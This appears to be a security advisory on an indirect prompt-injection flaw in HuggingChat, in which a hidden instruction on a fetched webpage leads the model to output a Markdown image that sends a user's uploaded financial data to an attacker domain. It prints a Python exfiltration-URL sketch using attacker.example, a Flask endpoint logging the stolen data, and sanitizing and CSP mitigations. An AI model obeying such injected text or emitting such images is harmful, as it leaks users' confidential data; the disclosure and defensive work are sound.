Threat Intelligence

A One-Pixel Image Can Leak Your Data in HuggingChat

HuggingChat (HuggingFace’s app for chatting with models) has been found vulnerable to zero-click data exfiltration risks via indirect prompt injection. 

Confidential revenue data is leaked after a prompt injection in a webpage manipulates HuggingChat into rendering an unsafe 1-pixel image.

By including a malicious instruction in a document, webpage, MCP tool response, or other data source, an attacker can manipulate models in HuggingChat into outputting unsafe, dynamically generated Markdown images that, when rendered in the chat, exfiltrate data from the other sources the AI has access to.
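
To make the mechanism concrete, here is a minimal sketch of what such a payload could look like. Everything in it (the attacker.example domain, the pixel.gif path, the d parameter, and the figures) is hypothetical, not taken from the actual exploit:

```python
from urllib.parse import quote

# Hypothetical stand-in for the contents of the user's uploaded file.
leaked = "Q3 revenue: $4.2M, costs: $3.1M"

# URL-encode the stolen text so it survives as a query parameter.
exfil_url = f"https://attacker.example/pixel.gif?d={quote(leaked)}"

# The Markdown image a manipulated model would output. As soon as the
# chat UI renders it, the browser requests exfil_url, no click required.
print(f"![summary]({exfil_url})")
# ![summary](https://attacker.example/pixel.gif?d=Q3%20revenue%3A%20%244.2M%2C%20costs%3A%20%243.1M)
```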

This vulnerability was responsibly disclosed to HuggingFace on 12/3/2025. As HuggingFace’s security team has not responded, we are publishing the details so that users are informed of the risks and can take precautions accordingly.

In this article, we demonstrate that an injection in a webpage can manipulate an AI model to output a malicious Markdown image that exfiltrates confidential financial data from a user’s uploaded document.
 

The Attack Chain

  1. The user uploads a document with financial data and adds an external ‘reviews’ website to the chat context using ‘Fetch from URL’.

    1. The user uploads a sensitive document (.txt with financial data) using ‘Add text file > Upload from device’.

      The uploaded file contains end-of-quarter financial data (revenue and costs) and a project name indicating that the contents are confidential.


    2. The user adds an untrusted data source (user reviews on an external site) to the model’s context window using ‘Add text file > Fetch from URL’. This website looks benign to the user reading it, but contains a hidden prompt injection visible to the LLM.

      An external website with platform reviews is added as context in the chat. The site appears benign, with no evident malicious content.


  2. The user makes a query, asking about the negative review on the website.

    The user enters a query asking how they can re-engage 'Jordan P' who left a bad review on the reviews site.


  3. The model reads the prompt injection and is manipulated into constructing a malicious Markdown image.

    The AI model begins its response by stating that, to re-engage the reviewer who left the bad review, they will need to be provided with a visual of the quarterly financials.

    Here, the model output indicates that it believes it must build a visual for the negative reviewer (this is what the prompt injection instructed the model to do).

    Now, the model outputs Markdown syntax to create a malicious image. In this syntax, the image’s source URL points at an attacker-controlled domain, with data from the user’s uploaded file encoded in its query parameters.

    When the Markdown syntax is processed by the user's browser, a request is made to the attacker's server, retrieving a 1-pixel image.

    The AI model outputs insecure Markdown syntax, resulting in the rendering of an untrusted 1-pixel image. The URL used to retrieve the image contains the quarterly financial data appended to the attacker's domain.


  4. The attacker can read the user’s financial data from their server logs.

    When the user's browser makes a request to retrieve the 1-pixel image from the attacker's domain, the financial data stored in the query parameters is transmitted with the request. Then, the attacker can read the financial data from the user’s uploaded file in their server logs:

    Quarterly financial data (revenue and costs) is visible in the attacker’s server logs. A sketch of such a logging endpoint follows below.
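
On the attacker’s side, nothing more than a web server that logs incoming requests is needed. A minimal sketch, assuming Flask; the pixel.gif path and the d parameter mirror the hypothetical payload sketched earlier and are not taken from the actual exploit:

```python
import io

from flask import Flask, request, send_file

app = Flask(__name__)

# A minimal 1x1 transparent GIF, so the request resolves to a valid image.
PIXEL = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02\x44\x01\x00\x3b"
)

@app.route("/pixel.gif")
def pixel():
    # The exfiltrated data arrives as an ordinary query parameter and
    # lands in the server log with no action from the victim.
    app.logger.warning("exfiltrated: %s", request.args.get("d", ""))
    return send_file(io.BytesIO(PIXEL), mimetype="image/gif")

if __name__ == "__main__":
    app.run(port=8080)
```
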
Mitigations

  1. Programmatically prohibit the rendering of Markdown images from external sites in model outputs without explicit user approval (e.g., add a confirmation dialog asking the user whether they would like to render the image, displaying the full URL being requested before the image is inserted).

  2. Implement a strict Content Security Policy to prevent the browser from making network requests to unapproved external domains, as sketched below.
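
As an illustration of both recommendations combined, here is a minimal Python sketch. The allowlisted hosts, the regular expression, and the CSP value are assumptions for demonstration, not HuggingChat’s actual configuration:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"huggingface.co", "cdn-uploads.huggingface.co"}

# Matches Markdown images: ![alt](url ...)
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace Markdown images on non-allowlisted hosts with a visible
    placeholder showing the full target URL, so the user can decide."""
    def check(match: re.Match) -> str:
        url = match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: render as-is
        return f"[blocked external image: {url}]"
    return MD_IMAGE.sub(check, markdown)

# Defense in depth: a CSP header that stops the browser itself from
# fetching images off unapproved origins, even if sanitization is bypassed.
CSP_HEADER = "Content-Security-Policy: img-src 'self' https://huggingface.co"

print(strip_untrusted_images(
    "![summary](https://attacker.example/pixel.gif?d=Q3%20revenue)"
))
# [blocked external image: https://attacker.example/pixel.gif?d=Q3%20revenue]
```

Output filtering alone is brittle (models can be coaxed into unusual encodings), which is why the CSP header matters: it blocks the exfiltration request in the browser even when a malicious image slips through.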